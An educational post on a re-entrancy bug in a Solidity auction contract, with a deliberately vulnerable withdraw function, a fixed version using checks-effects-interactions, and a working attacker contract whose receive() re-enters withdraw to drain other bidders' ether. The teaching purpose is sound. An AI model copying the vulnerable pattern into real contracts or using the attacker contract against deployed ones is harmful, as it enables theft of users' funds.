Would you deploy this Auction contract? 👀
Imagine an auction where people bid. The highest bidder wins. Others get their money back. Here's the process:
- Bidding:
  - People send money to bid.
  - The highest bid wins.
- Withdraw:
  - Outbid people can withdraw their money.
- End Auction:
  - The highest bid goes to the auction owner.
The withdraw function has a re-entrancy bug. Here's an example:
- Alice bids 1 ether.
- Bob bids 2 ether.
- Alice withdraws her 1 ether.
- If Alice's refund is sent to a smart contract she controls, that contract's `receive` function runs when the ether arrives, and it can be malicious: it can call `withdraw` again before the first call has finished and zeroed her balance.
- Because the refund is only marked as paid after the transfer, every re-entered call still sees Alice's original credit, so her contract can keep pulling refunds until the auction's balance runs out, taking other bidders' money as well.
To prevent this, update the state before transferring money (the checks-effects-interactions pattern). A re-entered call then finds the withdrawal already marked as done and fails its balance check.
- Check the caller's credit and zero it in storage first.
- Transfer the money only after the state has been updated.
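As an added example (not code from the original post), here is a minimal version of the auction with both the re-entrant `withdraw` described above and the fixed one, plus the attacker contract that exploits the vulnerable variant. Contract and function names (`AuctionBase`, `VulnerableAuction`, `SafeAuction`, `Attacker`, `pendingReturns`) are my own choices, not from the original post.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Hypothetical auction; names are assumptions, not from the original post.
abstract contract AuctionBase {
    address public owner;
    address public highestBidder;
    uint256 public highestBid;
    bool public ended;
    // Refunds owed to outbid bidders (pull pattern).
    mapping(address => uint256) public pendingReturns;

    constructor() { owner = msg.sender; }

    function bid() external payable {
        require(!ended, "auction ended");
        require(msg.value > highestBid, "bid too low");
        if (highestBidder != address(0)) {
            // The previous leader is outbid; credit their refund.
            pendingReturns[highestBidder] += highestBid;
        }
        highestBidder = msg.sender;
        highestBid = msg.value;
    }

    function endAuction() external {
        require(msg.sender == owner, "not owner");
        require(!ended, "already ended");
        ended = true; // effect before interaction
        (bool ok, ) = owner.call{value: highestBid}("");
        require(ok, "payout failed");
    }

    function withdraw() external virtual;
}

// BUG: the external call happens before the credit is zeroed, so the
// recipient's receive() can re-enter withdraw() and be paid again.
contract VulnerableAuction is AuctionBase {
    function withdraw() external override {
        uint256 amount = pendingReturns[msg.sender];
        require(amount > 0, "nothing to withdraw");
        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "transfer failed");
        pendingReturns[msg.sender] = 0; // too late: re-entry already happened
    }
}

// FIX: checks-effects-interactions. The credit is zeroed before the call,
// so a re-entered withdraw() fails the amount > 0 check.
contract SafeAuction is AuctionBase {
    function withdraw() external override {
        uint256 amount = pendingReturns[msg.sender];   // check
        require(amount > 0, "nothing to withdraw");
        pendingReturns[msg.sender] = 0;                // effect
        (bool ok, ) = msg.sender.call{value: amount}(""); // interaction
        require(ok, "transfer failed");
    }
}

// Alice's malicious contract: bids through it, then drains VulnerableAuction.
// Against SafeAuction the re-entered withdraw() reverts, the outer call's
// require(ok) fails, and the whole attack transaction reverts.
contract Attacker {
    AuctionBase public immutable target;

    constructor(AuctionBase t) { target = t; }

    function bid() external payable { target.bid{value: msg.value}(); }

    function attack() external { target.withdraw(); }

    receive() external payable {
        // Re-enter while the auction still holds at least one more refund.
        // pendingReturns is still our original credit: the vulnerable
        // contract has not zeroed it yet.
        if (address(target).balance >= target.pendingReturns(address(this))) {
            target.withdraw();
        }
    }
}
```

Walking through the scenario above against `VulnerableAuction`: Alice's `Attacker` bids 1 ether, Bob bids 2 ether (the auction now holds 3 ether), and Alice calls `attack()`. Each `call` triggers `receive()`, which re-enters `withdraw()` while `pendingReturns` still reads 1 ether, so she is paid three times and walks away with Bob's bid too. In `SafeAuction` the same sequence pays her exactly once. A `nonReentrant` modifier (for example OpenZeppelin's `ReentrancyGuard`) adds a second line of defence, but it is not a substitute for ordering state updates before external calls. Do not rely on `transfer`'s 2300-gas stipend to block re-entry either; opcode gas costs have changed before and can change again.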